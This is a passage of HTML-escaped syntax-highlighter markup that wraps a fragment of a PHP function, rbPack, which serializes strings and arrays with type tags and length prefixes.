-webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a9d336357845-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a9d336357845-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_string&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a9d336357845-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;STR&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;chr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a9d336357845-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a9d336357845-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;is_array&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a9d336357845-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;ARR&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;chr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a9d336357845-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbPack&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a9d336357845-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span 